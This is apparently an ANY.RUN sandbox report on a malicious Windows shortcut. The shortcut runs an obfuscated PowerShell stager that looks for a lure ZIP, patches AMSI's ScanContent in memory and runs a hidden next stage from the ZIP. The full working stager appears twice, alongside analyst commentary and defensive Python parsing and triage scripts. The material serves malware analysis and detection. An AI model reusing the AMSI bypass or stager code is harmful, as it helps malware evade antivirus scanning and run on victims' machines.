File name:

_ba929388ae8b854a9c98b37c4dae2bda4f15dd1cad97388224c4f636d7d26c6c.lnk

Full analysis: https://app.any.run/tasks/01c05915-8edc-4051-aece-2104461f7700
Verdict: Malicious activity
Analysis date: April 17, 2026, 15:10:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=45, Unicoded, Archive, length=431104, window=showminnoactive, IDListSize 0x018d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe"
MD5:

15B14B9829F34521450E4E7D8D212052

SHA1:

F52840234797DFAEFD29E8C42CB3868CCC81EC96

SHA256:

BA929388AE8B854A9C98B37C4DAE2BDA4F15DD1CAD97388224C4F636D7D26C6C

SSDEEP:

96:8s0FL5rrSKC9CnAOcO7+1RNY5Evp/MCc8KtwxFssAwFlsaAyZAHcGgli:8s0FjC9CAOcO7wRNaEvp/MC/KtwzsTwi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • References archive utilities (LNK)

      • powershell.exe (PID: 6816)
  • SUSPICIOUS

    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 6816)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode
FileAttributes: Archive
TargetFileSize: 431104
IconIndex: 45
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: Powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 0000-0000
VolumeLabel: -
LocalBasePath: C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe
CommandLineArguments: $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontent');$UKL=$ZbZSa::$sARqq('','iUt','ils');$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
IconFileName: %SystemRoot%\system32\SHELL32.dll
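The fields listed above are read straight out of the ShellLink (MS-SHLLINK) structure: the 76-byte ShellLinkHeader supplies LinkFlags, FileAttributes, TargetFileSize, IconIndex and ShowCommand, and the StringData section that follows the LinkTargetIDList and LinkInfo blocks carries the CommandLineArguments and IconLocation strings. The reader below is an added example, not ANY.RUN's parser: it decodes the header, skips the IDList and LinkInfo by their size fields (so LocalBasePath is not decoded), reads StringData, and applies three cheap triage heuristics. A builder for a constructed sample carrying the report's header values (flags 0xE3, Archive, IconIndex 45, SW_SHOWMINNOACTIVE, size 431104) is included so the block runs offline; the sample's IDList and LinkInfo are minimal stubs and its argument string is a short stand-in for the real one.

```python
"""Minimal MS-SHLLINK reader for the fields an LNK triage cares about
(added example). Header and StringData are decoded; LinkTargetIDList,
LinkInfo and ExtraData are skipped by size, not interpreted."""
import re
import struct

HEADER_FMT = "<I16sIIQQQIiIHHII"            # ShellLinkHeader, little-endian
HEADER_SIZE = struct.calcsize(HEADER_FMT)    # 0x4C = 76 bytes
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
LINK_FLAGS = [(0x01, "HasLinkTargetIDList"), (0x02, "HasLinkInfo"), (0x04, "HasName"),
              (0x08, "HasRelativePath"), (0x10, "HasWorkingDir"), (0x20, "HasArguments"),
              (0x40, "HasIconLocation"), (0x80, "IsUnicode")]
STRING_DATA = [(0x04, "Name"), (0x08, "RelativePath"), (0x10, "WorkingDir"),
               (0x20, "CommandLineArguments"), (0x40, "IconLocation")]
FILE_ATTRS = [(0x01, "ReadOnly"), (0x02, "Hidden"), (0x04, "System"), (0x20, "Archive")]
SHOW_CMD = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def parse_lnk(data: bytes) -> dict:
    """Decode the header, skip IDList/LinkInfo by size, read StringData."""
    if len(data) < HEADER_SIZE:
        raise ValueError("truncated: shorter than ShellLinkHeader")
    (hsize, clsid, flags, attrs, _ctime, _atime, _wtime, fsize, icon_idx, show,
     hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if hsize != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a ShellLink: bad HeaderSize or LinkCLSID")
    pos = HEADER_SIZE
    if flags & 0x01:                          # LinkTargetIDList = IDListSize + IDList
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & 0x02:                          # LinkInfo: LinkInfoSize spans the whole block
        (li_size,) = struct.unpack_from("<I", data, pos)
        pos += li_size
    unicode = bool(flags & 0x80)
    strings = {}
    for bit, name in STRING_DATA:             # present only when flagged, always in this order
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, not bytes
            pos += 2
            raw = data[pos:pos + count * (2 if unicode else 1)]
            pos += len(raw)
            # ANSI strings use the system code page; cp1252 is an assumption here
            strings[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return {"flags": [n for b, n in LINK_FLAGS if flags & b],
            "attributes": [n for b, n in FILE_ATTRS if attrs & b],
            "file_size": fsize, "icon_index": icon_idx,
            "show_command": SHOW_CMD.get(show, f"0x{show:x}"),
            "hotkey": hotkey, "strings": strings}


def red_flags(parsed: dict) -> list:
    """Cheap heuristics over the parsed fields; a profile, not a verdict."""
    out = []
    args = parsed["strings"].get("CommandLineArguments", "")
    icon = parsed["strings"].get("IconLocation", "")
    if args and parsed["show_command"] != "SW_SHOWNORMAL":
        out.append("has arguments and opens minimised/inactive")
    if re.search(r"\$\w+\s*=|\[type\]|scriptblock|-e(nc|c)?\b", args, re.I):
        out.append("argument string looks like inline PowerShell")
    if icon.lower().endswith(".dll"):
        out.append("icon taken from a system DLL rather than from the target")
    return out


def build_lnk(args: str, icon: str, *, file_size=431104, icon_index=45, show=7) -> bytes:
    """Constructed sample with the report's header values; IDList and LinkInfo
    are minimal stubs (an empty list and a header-only LinkInfo)."""
    flags = 0x01 | 0x02 | 0x20 | 0x40 | 0x80                   # 0xE3, as in the report
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LINK_CLSID, flags, 0x20, 0, 0, 0,
                         file_size, icon_index, show, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"                # IDListSize=2, TerminalID only
    linkinfo = struct.pack("<7I", 0x1C, 0x1C, 0, 0, 0, 0, 0)   # LinkInfoSize=HeaderSize=0x1C

    def sd(s: str) -> bytes:                                   # one Unicode StringData entry
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + idlist + linkinfo + sd(args) + sd(icon) + b"\x00\x00\x00\x00"  # TerminalBlock


# Constructed stand-in for the real argument string (see CommandLineArguments above)
SAMPLE_ARGS = "$ci=2;$TFhR='HkfDqfm';& $JjPVA;Write-Host '.'"
SAMPLE_ICON = r"%SystemRoot%\system32\SHELL32.dll"
SAMPLE_LNK = build_lnk(SAMPLE_ARGS, SAMPLE_ICON)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed)
    print(red_flags(parsed))
```

Run it over a real file with `parse_lnk(open(path, "rb").read())`. The three heuristics together describe this sample's profile: a shortcut that carries a PowerShell one-liner, opens its window minimised and inactive, and borrows icon 45 from SHELL32.dll so it renders as a folder or document rather than as a console.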
No data.
All screenshots are available in the full report
Total processes
137
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

start → powershell.exe (no specs) → conhost.exe (no specs)
slui.exe (spawned by svchost.exe, outside the chain)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 4136
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 6148
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6816
CMD: "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe" $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontent');$UKL=$ZbZSa::$sARqq('','iUt','ils');$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
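Read without its indirection, the one-liner that PID 6816 runs is a three-step stager. First it looks for `Dienstangebot_Hinterberger_J_07-04-26.zip\Dienstangebot_Hinterberger_J_07-04-26.zip` under %LOCALAPPDATA% and, failing that, walks `.`, Downloads, Documents and Desktop under %USERPROFILE% recursively for a ZIP of that name; if nothing is found it returns, which is consistent with the near-empty behaviour recorded here (no network activity from PowerShell, only profile and jump-list files dropped). Second, it takes the assembly behind the `[ref]` type (System.Management.Automation.dll), picks the type whose name matches `iUtils` and that type's NonPublic,Static method matching `canContent` (the names these fragments fit are AmsiUtils and ScanContent), then uses Marshal.ReadIntPtr and Marshal.Copy to copy the pointer stored 8 bytes past the MethodHandle of the harmless local method `B.A` over the same slot of the matched method, the managed AMSI patch. Third, it reads the ZIP as text lines, takes the first line containing the marker `HkfDqfm`, strips the marker, deletes every backtick, prefixes `$l='<zip path>';` (`[char](41-2)` is the apostrophe) and runs the result through `[scriptblock]::Create`. The ZIP is therefore both the lure and the carrier of the next stage, and it was not present in the sandbox. The script below is an added static triage example, not ANY.RUN's detection logic: it undoes the `.('name')` cmdlet indirection and the split-and-join string assembly, resolves the small constants hidden behind `$ci`, and reports the API pattern. Its input is a set of fragments copied from the argument string above (apostrophes normalised, intervening statements dropped); the flag names are the author's own.

```python
"""Static triage of the PowerShell one-liner carried in the LNK's
CommandLineArguments (added example). Pure regex; no PowerShell is run."""
import re

# Fragments of the argument string from the report, copied verbatim with the
# statements between them dropped; the real string is about 2 KB.
EXCERPT = r"""$ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontent');$UKL=$ZbZSa::$sARqq('','iUt','ils');$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR};$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;"""


def unwrap_calls(s: str):
    """Split the .('x') / ::('x') indirections into cmdlet names,
    instance-member names and static-member names."""
    cmdlets = re.findall(r"(?<![\w)\]])\.\('([\w-]+)'\)", s)   # .('gci') used as a command
    members = re.findall(r"(?<=[\w)\]])\.\('(\w+)'\)", s)      # $x.('Member')
    statics = re.findall(r"::\('(\w+)'\)", s)                  # [T]::('Method')
    return cmdlets, members, statics


def rejoin_strings(s: str) -> list:
    """Rebuild strings assembled as $t::$join('','pie','ce')."""
    joined = []
    for parts in re.findall(r"\$\w+::\$\w+\('',((?:'[^']*',?)+)\)", s):
        joined.append("".join(re.findall(r"'([^']*)'", parts)))
    return joined


def triage(s: str) -> dict:
    cmdlets, members, statics = unwrap_calls(s)
    joined = rejoin_strings(s)
    literals = dict(re.findall(r"\$(\w+)='([^']*)'", s))       # plain string assignments
    types = re.findall(r"\[type\]\(?'([\w.]+)'\)?", s)         # [type]('x') / [type]'x'
    env = re.findall(r"env:(\w+)", s)
    # Arithmetic on the $ci seed hides the small constants (offsets, char codes).
    m = re.search(r"\$ci=(\d+)", s)
    ci = int(m.group(1)) if m else 0
    consts = {f"{n}-$ci": int(n) - ci for n in re.findall(r"\((\d+)-\$ci\)", s)}
    flags = {
        "reflects_into_automation_dll": "ref" in types and "GetTypes" in members,
        "targets_amsi_scancontent": any("iUtils" in j for j in joined)
                                    and any("canContent" in j for j in joined),
        "patches_method_handle": "Runtime.InteropServices.Marshal" in joined
                                 and "MethodHandle" in members and "Copy" in statics,
        "builds_scriptblock_at_runtime": "scriptblock" in types and "::create(" in s.lower(),
        "reads_stage_from_local_file": "ReadLines" in statics,
    }
    return {"cmdlets": sorted(set(cmdlets)), "members": sorted(set(members)),
            "statics": sorted(set(statics)), "joined": joined, "literals": literals,
            "types": types, "env": sorted(set(env)), "consts": consts, "flags": flags}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EXCERPT), indent=2))
```

With `$ci=2` the resolved constants are 8 for both `(10-$ci)` offsets and 0 for the `(2-$ci)` start index, so the Marshal.Copy call writes exactly one pointer from `B.A`'s handle+8 to the target's handle+8. On a host with script block logging enabled the `[scriptblock]::Create` content still lands in event 4104 whether or not the AMSI patch succeeded, so the marker string `HkfDqfm` and the `$l='...zip';` prefix are worth hunting for in those logs.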
Total events
7 892
Read events
7 891
Write events
1
Delete events
0

Modification events

(PID) Process: (4136) slui.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation: write
Name: @%SystemRoot%\System32\sppcomapi.dll,-3200
Value: Software Licensing
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID | Process | Filename | Type
6816 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5:9D7228CB227B10C780FEC9487753873D
SHA256:EFE76057587C58BDE13903090614C071860C1DD03CF9423711C2D63E5123586A
6816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\aafae4b1b3a2d2a9.customDestinations-ms | binary
MD5:8F7B7322CBD1E0C37F47F1521F6726D5
SHA256:C22E59C7EA6A79D14ACECD2D71DBCE9188346391E1EA29D2E0DA13A561663D80
6816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rylpgp0h.ggz.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_11nvdnix.zmv.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZJLEASFR0Z0RSZRGBMK9.temp | binary
MD5:8F7B7322CBD1E0C37F47F1521F6726D5
SHA256:C22E59C7EA6A79D14ACECD2D71DBCE9188346391E1EA29D2E0DA13A561663D80
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
78
TCP/UDP connections
53
DNS requests
20
Threats
1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5276 | MoUsoCoreWorker.exe | GET | 304 | 4.231.128.59:443 | https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30 | US | | | whitelisted
6684 | svchost.exe | GET | 200 | 23.216.77.42:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
5276 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted
5316 | svchost.exe | POST | 200 | 40.126.31.73:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | whitelisted
5316 | svchost.exe | POST | 200 | 20.190.160.3:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | whitelisted
 | | POST | 400 | 20.190.160.3:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
5316 | svchost.exe | POST | 400 | 40.126.31.73:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
 | | POST | 400 | 20.190.160.3:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | binary | 203 b | whitelisted
5316 | svchost.exe | POST | 400 | 40.126.31.73:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
6684 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | Not routed | | whitelisted
6684 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5276 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7824 | slui.exe | 48.192.1.64:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5532 | SearchApp.exe | 2.16.241.206:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted
4 | System | 192.168.100.255:138 | | Not routed | | whitelisted
6684 | svchost.exe | 23.216.77.42:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
6684 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
5276 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
5276 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
  • 40.127.240.158
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
www.bing.com
  • 2.16.241.206
  • 2.16.241.218
  • 2.16.241.222
  • 2.16.241.205
  • 2.16.241.219
  • 2.16.241.201
  • 2.16.241.207
whitelisted
google.com
  • 172.217.20.142
whitelisted
crl.microsoft.com
  • 23.216.77.42
  • 23.216.77.8
  • 23.216.77.30
  • 23.216.77.25
  • 23.216.77.6
  • 23.216.77.20
  • 23.216.77.22
  • 23.216.77.28
  • 23.216.77.19
  • 23.216.77.36
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 23.59.18.102
whitelisted
login.live.com
  • 40.126.31.73
  • 20.190.159.128
  • 20.190.159.71
  • 40.126.31.2
  • 20.190.159.64
  • 20.190.159.68
  • 20.190.159.130
  • 20.190.159.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 74.178.240.51
whitelisted

Threats

PID | Process | Class | Message
6684 | svchost.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
No debug info